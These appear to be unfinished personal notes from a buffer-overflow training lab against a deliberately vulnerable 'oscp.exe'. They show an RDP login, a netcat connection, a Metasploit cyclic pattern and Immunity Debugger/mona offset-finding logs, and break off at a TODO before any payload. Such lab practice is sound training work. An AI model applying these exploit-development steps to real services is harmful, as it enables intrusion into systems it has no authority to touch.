bofprep

Overflow 1

xfreerdp /u:admin /p:password /cert:ignore /v:10.10.16.170 /workarea

immunity debugger: oscp.exe

nc 10.10.16.170 1337

└──╼ $/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9
Log data
Address    Message
           Immunity Debugger 1.85.0.0 : R'lyeh
           Need support? visit http://forum.immunityinc.com/
           "C:\Users\admin\Desktop\vulnerable-apps\oscp\oscp.exe"

           Console file 'C:\Users\admin\Desktop\vulnerable-apps\oscp\oscp.exe'
           [18:15:09] New process with ID 000003D8 created
004012D0   Main thread with ID 000009F8 created
00400000   Modules C:\Users\admin\Desktop\vulnerable-apps\oscp\oscp.exe
62500000   Modules C:\Users\admin\Desktop\vulnerable-apps\oscp\essfunc.dll
75BA0000   Modules C:\Windows\system32\KERNELBASE.dll
75C80000   Modules C:\Windows\system32\msvcrt.dll
76E40000   Modules C:\Windows\system32\kernel32.dll
76F20000   Modules C:\Windows\system32\RPCRT4.dll
777A0000   Modules C:\Windows\SYSTEM32\ntdll.dll
77900000   Modules C:\Windows\system32\NSI.dll
77930000   Modules C:\Windows\system32\WS2_32.dll
004012D0   [18:15:09] Program entry point
           Analysing oscp
             16 heuristical procedures
             236 calls to known functions
             8 loops, 1 switches
0BADF00D   [+] Command used:
0BADF00D   !mona config -set workingfolder c:\mona\%p
0BADF00D   Writing value to configuration file
0BADF00D   Old value of parameter workingfolder =
0BADF00D   [+] Creating config file, setting parameter workingfolder
0BADF00D   New value of parameter workingfolder =  c:\mona\%p
0BADF00D
0BADF00D   [+] This mona.py action took 0:00:00
75330000   Modules C:\Windows\system32\mswsock.dll
76FD0000   Modules C:\Windows\system32\user32.dll
77350000   Modules C:\Windows\system32\GDI32.dll
77210000   Modules C:\Windows\system32\LPK.dll
75E90000   Modules C:\Windows\system32\USP10.dll
77910000   Modules C:\Windows\system32\IMM32.DLL
76D70000   Modules C:\Windows\system32\MSCTF.dll
00401973   New thread with ID 000000EC created
           [18:23:57] Thread 000000EC terminated, exit code 0
0BADF00D   [+] Command used:
0BADF00D   !mona findmsp -distance 600
0BADF00D   [+] Looking for cyclic pattern in memory
74E80000   Modules C:\Windows\System32\wshtcpip.dll
0BADF00D       Cyclic pattern (normal) found at 0x003c3952 (length 600 bytes)
0BADF00D   [+] Examining registers
0BADF00D   [+] Examining SEH chain
0BADF00D   [+] Examining stack (+- 600 bytes) - looking for cyclic pattern
0BADF00D       Walking stack from 0x0022f7b8 to 0x0022fc6c (0x000004b4 bytes)
0BADF00D   [+] Examining stack (+- 600 bytes) - looking for pointers to cyclic pattern
0BADF00D       Walking stack from 0x0022f7b8 to 0x0022fc6c (0x000004b4 bytes)
0BADF00D   [+] Preparing output file 'findmsp.txt'
0BADF00D       - Creating working folder c:\mona\oscp
0BADF00D       - Folder created
0BADF00D       - (Re)setting logfile c:\mona\oscp\findmsp.txt
0BADF00D   [+] Generating module info table, hang on...
0BADF00D       - Processing modules
0BADF00D       - Done. Let's rock 'n roll.
0BADF00D
0BADF00D   [+] This mona.py action took 0:00:06.146000
0BADF00D   [+] Command used:
0BADF00D   !mona findmsp -distance 600
0BADF00D   [+] Looking for cyclic pattern in memory
0BADF00D       Cyclic pattern (normal) found at 0x003c3952 (length 600 bytes)
0BADF00D   [+] Examining registers
0BADF00D   [+] Examining SEH chain
0BADF00D   [+] Examining stack (+- 600 bytes) - looking for cyclic pattern
0BADF00D       Walking stack from 0x0022f7b8 to 0x0022fc6c (0x000004b4 bytes)
0BADF00D   [+] Examining stack (+- 600 bytes) - looking for pointers to cyclic pattern
0BADF00D       Walking stack from 0x0022f7b8 to 0x0022fc6c (0x000004b4 bytes)
0BADF00D   [+] Preparing output file 'findmsp.txt'
0BADF00D       - (Re)setting logfile c:\mona\oscp\findmsp.txt
0BADF00D   [+] Generating module info table, hang on...
0BADF00D       - Processing modules
0BADF00D       - Done. Let's rock 'n roll.
0BADF00D
0BADF00D   [+] This mona.py action took 0:00:13.152000

[TODO: FINISH THIS !!!]